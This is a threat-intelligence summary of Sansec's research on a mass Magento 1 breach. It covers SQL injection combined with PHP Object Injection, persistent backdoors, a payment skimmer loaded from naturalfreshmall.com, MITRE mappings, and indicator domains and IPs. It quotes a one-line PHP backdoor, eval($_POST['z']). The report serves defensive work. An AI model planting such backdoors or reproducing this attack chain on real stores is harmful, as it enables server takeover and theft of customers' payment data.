Sansec tracked a mass Magento 1 compromise affecting hundreds of stores, with about 374 stores infected in a single day as part of a broader breach impacting 500+ shops. Attackers loaded a payment skimmer from naturalfreshmall.com and left numerous backdoors and modified files to maintain access; the operation leveraged a combination of public-facing application exploits and server-side code execution. Hashtags: #Naturalfreshmall #Magento1 #Sansec #Zend_Memory_Manager #POI #SQLi
Keypoints
- Mass Magento 1 breach: hundreds of ecommerce stores were compromised in a short period, with thousands of attempts observed across the ecosystem.
- Attack chain: attackers used a combination of an SQL injection (SQLi) and PHP Object Injection (POI) to gain control of Magento stores.
- POI abuse via Quickview: the Quickview plugin vulnerability was exploited to run code on the server, including adding a validation rule to a Magento table to enable backdoor access.
- Backdoor creation and persistence: the attack ended up leaving at least 19 backdoors on infected systems, including various api_*.php files and other modified components.
- New customer flow trigger: the attack leveraged new-customer signup flows to trigger an unserialize and execute code, enabling remote control through a backdoor.
- Payment skimmer and data interception: the actual payment interception code was added into Magentoβs core_config_data design/footer area, linked to naturalfreshmall.com, to skim payment data.
MITRE Techniques
- [T1190] Exploit Public-Facing Application β Attackers used a combination of an SQL injection (SQLi) and PHP Object Injection (POI) to gain control of the Magento store. [βclever combination of an SQL injection (SQLi) and PHP Object Injection (POI) attack to gain control of the Magento store.β]
- [T1136.001] Create Account β The Quickview vulnerability typically is used to inject rogue Magento admin users; in this case the flaw was used to run code directly on the server. [βWhile this is typically abused to inject rogue Magento admin users, in this case the attacker used the flaw to run code directly on the server.β]
- [T1059.007] PHP β The attacker generated a PHP backdoor file (api_1.php) with code such as eval($_POST[βzβ]). [βcreate a file called api_1.php with a simple backdoor eval($_POST[βzβ]).β]
Indicators of Compromise
- [Domain] naturalfreshmall.com β Used to load malware and host related payloads (e.g., image/pixel.js). naturalfreshmall.com is repeatedly referenced as the source of the malicious payload.
- [File] api_1.php β Backdoor file created on infected systems to accept remote commands.
- [File] api.php β Additional backdoor file listed among malicious or modified components.
- [IP] 132.255.135.230 β IP implicated in the attack.
- [IP] 138.36.92.216 β IP implicated in the attack.
Read more: https://sansec.io/research/naturalfreshmall-mass-hack